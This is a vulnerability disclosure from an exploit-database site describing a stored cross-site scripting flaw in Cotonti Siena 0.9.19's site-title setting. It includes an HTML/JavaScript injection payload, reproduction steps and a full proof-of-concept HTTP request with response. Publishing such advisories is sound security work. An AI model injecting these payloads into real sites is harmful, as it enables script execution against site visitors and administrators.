Cotonti Siena 0.9.19 maintitle Stored Cross-Site Scripting

2021.06.22
Credit: Fatih İLGİN
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Cotonti Siena 0.9.19 - 'maintitle' Stored Cross-Site Scripting # Date: 2021-15-06 # Exploit Author: Fatih İLGİN # Vendor Homepage: cotonti.com # Vulnerable Software: https://www.cotonti.com/download/siena_0919 # Affected Version: 0.9.19 # Tested on: Windows 10 # Vulnerable Parameter Type: POST # Vulnerable Parameter: maintitle # Attack Pattern: "><img src=1 href=1 onerror="javascript:alert(1)"></img> # Description 1) Entering the Admin Panel (vulnerableapplication.com/cotonti/admin.php) 2) Then go to Configuration tab and set payload ("><img src=1 href=1 onerror="javascript:alert(1)"></img>) for Site title param 3) Then click Update button 4) In the end, Go to home page then shown triggered vulnerability # Proof of Concepts Request; POST /cotonti/admin.php?m=config&n=edit&o=core&p=title&a=update HTTP/1.1 Host: vulnerableapplication.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 440 Origin: https://vulnerableapplication.com Connection: close Referer: https://vulnerableapplication/cotonti/admin.php?m=config&n=edit&o=core&p=title Cookie: __cmpconsentx19318=CPH17mBPH17mBAfUmBENBeCsAP_AAH_AAAYgG9tf_X_fb3_j-_59__t0eY1f9_7_v-0zjheds-8Nyd_X_L8X_2M7vB36pr4KuR4ku3bBAQdtHOncTQmx6IlVqTPsb02Mr7NKJ7PEmlsbe2dYGH9_n9XT_ZKZ79_____7________77______3_v__9-BvbX_1_329_4_v-ff_7dHmNX_f-_7_tM44XnbPvDcnf1_y_F_9jO7wd-qa-CrkeJLt2wQEHbRzp3E0JseiJVakz7G9NjK-zSiezxJpbG3tnWBh_f5_V0_2Sme_f____-________--______9_7___fgAAA; __cmpcccx19318=aBPH17mCgAADAAXAA0AB4AQ4DiQKnAAA; _ga=GA1.2.1498194981.1623770561; _gid=GA1.2.1196246770.1623770561; __gads=ID=63f33aa9dd32c83c-220723d35ec800e9:T=1623770613:RT=1623770613:S=ALNI_MZ0ifDGVpIXuopc8JXvo208SRTYmA; PHPSESSID=ahmanvhckp2o5g5rnpr4cnj9c3 &x=701dad27076b1d78&maintitle=%22%3E%3Cimg+src%3D1+href%3D1+onerror%3D%22javascript%3Aalert(1)%22%3E%3C%2Fimg%3E&subtitle=Subtitle&metakeywords=&title_users_details=%7BUSER%7D%3A+%7BNAME%7D&title_header=%7BSUBTITLE%7D+-+%7BMAINTITLE%7D&title_header_index=%7BMAINTITLE%7D+-+%7BDESCRIPTION%7D&subject_mail=%7BSITE_TITLE%7D+-+%7BMAIL_SUBJECT%7D&body_mail=%7BMAIL_BODY%7D%0D%0A%0D%0A%7BSITE_TITLE%7D+-+%7BSITE_URL%7D%0D%0A%7BSITE_DESCRIPTION%7D Response; HTTP/1.1 200 OK Date: Tue, 15 Jun 2021 16:07:59 GMT Server: Apache Expires: Mon, Apr 01 1974 00:00:00 GMT Cache-Control: no-store,no-cache,must-revalidate, post-check=0,pre-check=0 Pragma: no-cache Last-Modified: Tue, 15 Jun 2021 04:07:59 GMT Vary: Accept-Encoding X-Robots-Tag: noindex,nofollow Content-Length: 4366 Connection: close Content-Type: text/html; charset=UTF-8 <h1 class="body"><a href="admin.php" title="Administration panel">Administration panel</a> / <a href="admin.php?m=config" title="Configuration">Configuration</a> / <a href="admin.php?m=config&n=edit&o=core&p=title" title="Titles and Metas">Titles and Metas</a></h1> <div id="main" class="body clear"> <h2>Configuration</h2> <div class="done"> <h4>Done</h4> <ul> <li>Updated</li> </ul> </div>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top